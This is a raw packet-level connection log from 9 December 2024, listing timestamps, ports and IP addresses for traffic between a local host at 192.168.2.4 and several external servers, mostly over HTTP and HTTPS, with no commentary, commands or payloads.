Dec 9, 2024 08:08:47.861504078 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:47.861917973 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:47.862145901 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:47.862145901 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:47.981410980 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:47.981435061 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:47.981482029 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:48.307235003 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:48.307411909 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:48.310188055 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:48.310216904 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:48.310513020 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:48.315574884 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:48.315574884 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:48.315649986 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:48.420881033 CET	443	49876	35.190.72.216	192.168.2.4
Dec 9, 2024 08:08:48.427342892 CET	443	49876	35.190.72.216	192.168.2.4
Dec 9, 2024 08:08:48.428865910 CET	49876	443	192.168.2.4	35.190.72.216
Dec 9, 2024 08:08:48.438658953 CET	49876	443	192.168.2.4	35.190.72.216
Dec 9, 2024 08:08:48.438664913 CET	443	49876	35.190.72.216	192.168.2.4
Dec 9, 2024 08:08:48.438781977 CET	49876	443	192.168.2.4	35.190.72.216
Dec 9, 2024 08:08:48.438838005 CET	443	49876	35.190.72.216	192.168.2.4
Dec 9, 2024 08:08:48.443821907 CET	49876	443	192.168.2.4	35.190.72.216
Dec 9, 2024 08:08:49.169744968 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:49.169832945 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:49.175328016 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:49.177141905 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:49.181175947 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:49.181195021 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:49.181205988 CET	49875	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:49.181211948 CET	443	49875	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:49.182137012 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:49.301410913 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:49.301486015 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:49.301661968 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:49.420854092 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:49.704195976 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:49.711925983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:50.009632111 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:50.128969908 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:50.129043102 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:50.129734993 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:50.210103989 CET	49848	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:50.210345984 CET	49889	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:50.248938084 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:50.311439991 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:50.329591990 CET	80	49889	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:50.329905987 CET	80	49848	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:50.337244034 CET	49848	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:50.337258101 CET	49889	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:50.341017962 CET	49889	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:50.430773020 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:50.460221052 CET	80	49889	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:50.669265985 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.669970036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.669981003 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.670222044 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.672669888 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.672682047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.672736883 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.675622940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.675636053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.676292896 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.678602934 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.678616047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.678658962 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.681519985 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.681684017 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.789498091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.790133953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.798055887 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.861818075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.862407923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.862462044 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.865922928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.866607904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.866667986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.874288082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.874918938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.874972105 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.882603884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.883286953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.883375883 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.890916109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.891597033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.892211914 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.899322987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.899966002 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.900019884 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.907639027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.908325911 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.909409046 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.916023016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.916721106 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.916768074 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.924343109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.925038099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.925416946 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.932735920 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.933418989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.938783884 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.941085100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.941736937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:50.941785097 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:50.987073898 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:50.987112045 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:50.994421959 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:50.994442940 CET	443	49896	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:50.997292995 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:50.997292042 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:50.998817921 CET	49895	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:50.998832941 CET	443	49895	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:51.000230074 CET	49896	443	192.168.2.4	142.250.181.78
Dec 9, 2024 08:08:51.000241041 CET	443	49896	142.250.181.78	192.168.2.4
Dec 9, 2024 08:08:51.054016113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.054661989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.058092117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.058794022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.058958054 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.059953928 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.066549063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.067217112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.067472935 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.074836016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.075516939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.075572968 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.079843044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.080508947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.083040953 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.084662914 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.085371971 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.089489937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.089515924 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.090176105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.090399981 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.094327927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.095042944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.095216036 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.099447012 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.100060940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.100214005 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.104027033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.104713917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.105279922 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.108766079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.109472036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.109524012 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.113575935 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.114275932 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.114413023 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.118458033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.119136095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.119194984 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.123289108 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.123956919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.124516010 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.128063917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.128745079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.129862070 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.132884026 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.246349096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.246421099 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.247006893 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.250993967 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.252348900 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.252360106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:51.253995895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.255281925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.259260893 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.260910034 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.262382984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.263338089 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.267720938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.268080950 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:51.268084049 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.268466949 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.268881083 CET	49897	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:51.268914938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.271842957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.272516012 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.275873899 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.277194977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.279947996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.280625105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.283657074 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.284305096 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.284346104 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.284425974 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.285135984 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.288722992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.289405107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.291623116 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.293111086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.293791056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.297519922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.298051119 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.298181057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.301884890 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.302612066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.303338051 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.306279898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.306327105 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.306935072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.310657024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.311338902 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.314793110 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.315027952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.315704107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.316688061 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.319427967 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.320168018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.323811054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.324078083 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.324480057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.328246117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.328289986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.328922987 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.332664013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.333312988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.336982965 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.337650061 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.339385986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.341377020 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.342020035 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.342159986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.345776081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.346019030 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.346405983 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.350202084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.350388050 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.350820065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.388118029 CET	80	49897	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:51.394303083 CET	49897	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:51.394543886 CET	49897	80	192.168.2.4	34.107.221.82
Dec 9, 2024 08:08:51.439774990 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.439789057 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.440164089 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.442475080 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.442517996 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.443743944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.445094109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.446487904 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.450459957 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.450476885 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.450483084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.453092098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.454459906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.454652071 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.458446980 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.458458900 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.461072922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.462420940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.464076042 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.466437101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.466449976 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.468183994 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.469090939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.469108105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.469161034 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.474488974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.474500895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.477147102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.477159023 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.482446909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.482456923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.483860016 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.485080004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.485099077 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.490520954 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.491058111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.491070986 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.493972063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.493984938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.496999979 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.499213934 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.499933004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.502914906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.502927065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.504082918 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.505888939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.508789062 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.508809090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.510694981 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.511776924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.511790991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.514779091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.517716885 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.517729044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.518078089 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.520662069 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.520674944 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.523628950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.523641109 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.524076939 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.526673079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.526685953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.526695967 CET	80	49897	34.107.221.82	192.168.2.4
Dec 9, 2024 08:08:51.527859926 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.529612064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.529630899 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.531030893 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.532502890 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.532526016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.532538891 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.534841061 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.535538912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.535552025 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.536228895 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.538460970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.538471937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.541414022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.541425943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.544234991 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.544389963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.547343016 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.547354937 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.549213886 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.553293943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.553338051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.557595968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.557648897 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.557660103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.560914993 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.560967922 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.560980082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.561148882 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.562525988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.562537909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.565095901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.565123081 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.566704035 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.568115950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.568135977 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.569106102 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.571048021 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.571059942 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.571072102 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.573757887 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:51.574014902 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:51.574040890 CET	80	49886	185.215.113.16	192.168.2.4
